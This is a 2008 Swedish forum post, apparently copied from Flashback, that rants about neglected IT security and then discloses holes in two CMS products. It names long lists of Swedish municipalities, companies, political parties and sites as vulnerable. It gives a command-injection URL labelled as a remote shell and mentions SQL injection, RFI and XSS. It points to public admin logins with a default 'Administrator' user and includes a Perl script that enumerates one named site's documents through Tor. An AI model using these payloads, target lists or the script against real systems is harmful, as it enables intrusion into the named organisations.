Alex
Spelansvarig
Den senaste tiden har det vuxit en sorts ilska inom mig riktad mot Sveriges både offentliga och privata sektor. Nästan dagligen slår jag upp tidningen och läser om alla dessa hackare som återigen tagit sig in på något höguppsatt nät och orsakat kalabalik. "Nästan allt är möjligt för dessa hackare", säger man till pressen.
30 apr 2008 #0
Men varför är det möjligt då? Kan det bero på att ingen agerar? Den kostnadsfria metoden kallad "kryptering" har övervägts, säger man som om det skulle räcka. Hobbysidor i form av whoa.nu och privata fildelningssiter går ut om att de uppdaterat lösenordspolicy och infört kryptering. Det höguppsatta Sverige sover, "det händer aldrig oss". Men om det händer är det terrorister ändå, så det är väl inte så mycket att bry sig om?
För sju dagar sedan publicerade jag samma information under annat diskussionsunderlag i den avancerade delen av IT-Säkerhet. Nu är jag intresserad av att upplysa er, användare såsom resterande del av Sverige, om dessa solklara brister som skrivs nedan. Jag belönar er även med enkelt formulerade frågor:
- Varför ligger Sverige i dvala?
- Varför är vi beroende av andras beslut?
- Varför är säkerhet fortfarande inte ett heltidsarbete?
- Vad kan vi göra för att få dem att bättra sig? Är publiceringen av denna typ av rätt kaliber?
OBS!!! 1227 HACKER RiKTAD TERRORiSTATTACK MOT SVERJE!1! OBS!! ARViD AEGER DEY
Problem: Ingen ändring i koden sedan 2005.
Sårbara i dagsläget: Botkyrka Kommun, Fagersta Kommun, Gotlands Kommun, Helsingborgs stad, Håbo Kommun, Hässleholms Kommun, Jönköpings kommun - Tekniska kontoret, Klippans Kommun, Malmö Stad, Miljöförvaltningen i Stockholms stad, Osby kommun, Regionförbundet Jönköpings län, Regionförbundet Östsam, Stockholms Läns Landsting, Södra Roslagens Brandförsvarsförbund, Trelleborgs Kommun och Ängelholms Kommun.
Remote shell:
Kod:
index.php?dispatchTo=Renderer&action=download&file=foo&size=";pwd%20
Givetvis finns det fler luckor, därför bjuds det på källkoden av denna CMS :-) (Tidigare nämnda hamstrar på version 4.0, jag ger er 4.1-alpha för enkelhetens skull.)
Problem: Sårbart i princip överallt utan överdrifter. Vidareutveckling av ovan nämnda CMS (gått från PHP=>ASP). Liknande metod att visa bilder som tidigare nämnda sårbarhet. Den som letar hittar många goda påskägg ;-)
Sårbara i dagsläget: Direct Försäkringsmäklarna, Godvig Capital Management, Priveq Invest, Skarpa, Säkra Försäkringsmäklare Småland, Bygg och fastighetssektor, Aberdeen Proporty Investors, A-hus, Boultbee, Bygg-Fast, Derome, Erik Olsson Fastighetsförmedling, Flexator, Karlstads Bostads, Landstingsfastigheter, PEAB, SmåaHus, Svensk Företagsförmedling, Svenska Mäklarhuset, Vätterhem, Handelns Utredningsinstitut, Handelskammaren, HUR Handelns Utrednings Råd, IFN, Institutet för näringslivsforskning, Jönköping Science Park, SFK Certifiering, SiSP Swedish Incubator & Science Parks, Arbetsgivarförbundet för ideella organisationer, IDEA, Baltic Sea Trade Union Network, Barn & Ungdomsgruppen i Stockholm, Bil Sweden, Byggnadsämnesförbundet, BÄF, Danskt vatten, Dramatiska Institutet, Elektronikindustriförbundet, Fairlink, Fastighetsägarna, Folkbildningsrådet, Folkpartiet Liberalerna, Föreningen för marknadsföring av Jönköping, Företagarna, Grafiska företagens förbund, Handelns Arbetsmiljökommitté, HAK, Industri- och Kemigruppen, Industriforum i Jönköping, J-Södra, Kristdemokraterna, Kyrkans Akademikerförbund, Livsmedelsföretagen, Metallgruppen, Miljöpartiet de Gröna, Nordens Fackliga Samorganisation, Pelletsbranschen, Skattebetalarnas förening, Skogs- och Lantarbetsgivarförbundet, Skogsindustrierna, Stiftelsen Carl Malmsten, Studieförbundet Bilda, Swedish Labtech, Sindif, Svensk Handel, Svensk Handel Kunskap, Svenska Afghanistankommittén, Svenska Akademin, Svenska Alliansmissionen, Svenska Försvarsutbildningsförbundet, Svenskt Vatten , Sveriges Frisörföretagare Service, Sveriges och universitets- och högskoleförbund, SUHF, Sveriges Pensionärsförbund, SPF, Teaterförbundet, Trä- och Möbelindustriförbundet, Återvinningsindustrierna, A6 Center, Abstracta AB, Ahlifax - AdCap, Document Systems, EM Home Interior, Expand International, Fagerhult AB, Fältöversten Centrum, Fresks i Östersund, Habo Industry, Hafa Badrum, Industrilås, Isaberg Rapid, Kinnarps, Lascale Ltd, Materia Klaessons, Maxxium Nordic Travel Retail, Maxxium Sweden, Fine Wine and Spirits, Mirro, Mitab Produktion AB, Möbelvärlden.se, Newell Rubbermaid Scandinavia, Ringen Centrum, Skärholmens Centrum, Västermalmsgallerian, Allytec, Alna Sverige, Carema, Nordic Biolabs, Previa, SciBase, Team Ortopedteknik, Altcom, Astando, Basset Labs, Datamatrix, Inobiz, Open Text, Optimal Solutions, Referat Fastighetsinformation, Strategic IT Solutions, SweRaCom, Syntell, Arktryckaren, Bokförklaget Langenskiöld, Caliber Media, Centralredaktionen, Liberala Nyhetsbyrån, Mediavision, Speakers AB, Starcom Sweden, Tidningen Chef, Tryckopia, Yoursongs Europé, Anza, Basset Labs, Cellwood Machinery, Edströms, Eurosteel, Fasadglas, Habo Industry, Hedbergs Mekaniska Verkstad, Helge Nyberg, Industrilås, Isaberg Rapid, Kalmar Industries, LG Collection, Mastec AB, Olsbergs Hydraulics, Pelly Industri, Powtech, RH Form, Rörets Industrier, Rutab, Scandinavian Eyewear, Strömsholmen, TomsWebes, Unigraphics, VEBE Teknik, Vedum Kök & Bad, WEMO Automation, Aditro Logistics , DSV Road, Finnvedens Lastvagnar väst, ISS Trafficare, Sensys Traffic, SLL Transport, Erik Olsson Fastighetsförmedling, Hair Art School, Helhet, Idas Brygga, IL Recycling, Industripoolen, Intend, Intercoiffure Sverige, ISS Facility Services, Jönköpings Energi, KAMI Stockholm, Nova Affärsutveckling, Preswede, Smålands Turism, Svensk Företagsförmedling, Svenska Mäklarhuset, Trivas Inomhusmiljö, Utsikten Meetings, Vandalorum, Vem rekrytering och Österåkers Golf.
(Egentligen vill jag markera alla i listan men jag nöjer mig med de "viktigaste". Ursäkta min subjektivitet.)
SQL-injections, RFI&h4kk3r3x3kv3r1ng lite överallt:
Kod:
Microsoft OLE DB Provider for SQL Server error '80040e14' Invalid operator for data type. Operator equals modulo, type equals varchar. /litiumshell20/classes/db.asp, line 290
Problem: Publika adminsidor, viss XSS-sårbarhet.
Sårbara i dagsläget: teknikhuset.se contentstudio.se biblioteket.se skekraft.se brottsoffermyndigheten.se skellefteakraft.se vindeln.se generationv.se vmfsyd.se vmfnord.se olofsfors.com it-arkitekterna.se uminova.se kultur.stockholm.se skelleftea.se norsjo.se lsh.se ung08.nu uminovainnovation.se busslink.se vll.se minabibliotek.se processitinnovations.se sameportalen.se yamahacenter.com. statensarkiv.se reaxcer.se lundbergs.se intelligo.se vittra.se sekab.com svenskakyrkan.se arbetslivsresurs.se fargotapet.com norrlandsoperan.se interbib.se rejmes.se indexator.se rekosundsvall.com gaia.se alo.se varm.nu konstkansliet.stockholm.se lif.se vmfqbera.se junibacken.se dataductus.net vasterbottensmat.nu ucmm.cs.it-norr.com jobmeal.se traena.com umea.fh.se northsweden.org nordiskmusik.se konftel.se serva.net separett.se komatsuforest.com umeaenergi.se armadafast.se externwebb.osterstroms.com konsumnord.se lsh.it-norr.com nordmaling.se biotechumea.se bostaden.umea.se martinsons.se naturpost.se naturdiet.fi infomer.se esculapen.se brottsofferportalen.se rattegangsskolan.se
mfl., t.ex. Clas Ohlsons och Arbetslivsresurs intranät.
Exempel på publicerade standarddokument i v4.7:
http://www.biotechumea.se/default.asp?id=38
http://www.biotechumea.se/default.asp?id=76
Sedan ligger även väldigt många sidor på 5.•, t.ex. svenskakyrkan.se som körs med 5.1.5004. Gemensamt för sidor med denna version är t.ex., som tidigare nämnt, publikt åtkomliga inloggningssidor (http://www.svenskakyrkan.se/default.aspx?di=6 och /cs/), standarduser "Administrator". Ingen CAPTCHA.
CMSen ifråga identifierar sig via <meta>-taggar, t.ex.
Kod:
<meta name="GENERATOR" content="Content Studio Enterprise Edition 5.1.5004 2008-02-01" /></head>
För att kartlägga standarddokument i versionerna krävs givetvis inga avancerade kunskaper. Någon lyckas säkert hitta något slarvfel men det är inget jag kommer bry mig om :-)
Kod:
#!/usr/bin/perl print "start: "; chomp($start = <STDIN>); print "stop: "; chomp($stop = <STDIN>); while($start != $stop) { print "$start saved as ./$start.txt\n"; readpipe("torify lynx --source \"http://www.biotechumea.se/default.asp?id=$start\" > $start"); $start++; }
En range på 0-100 brukar generera mer information än vad som "krävs". T.ex.:
Kod:
$ cat biotechumea/• | grep "Content Studio" <meta name="Creator" content="<Content Studio runtime>"> <meta name="GENERATOR" content="Content Studio Enterprise Edition. Version 4.7"> <meta name="Creator" content="<Content Studio runtime>"> <meta name="GENERATOR" content="Content Studio Enterprise Edition. Version 4.7"> <meta name="Creator" content="<Content Studio runtime>"> alert("You can not perform this from Content Studio admin"); <meta name="Creator" content="<Content Studio runtime>"> <meta name="GENERATOR" content="Content Studio Enterprise Edition. Version 4.7">
Givetvis finns det mer än att bara ta reda på vad som publicerats och vilken version som används. Du som söker skall finna, typ.
- h4cked by ARViD89
Saxxat från Flashback.
0 poäng
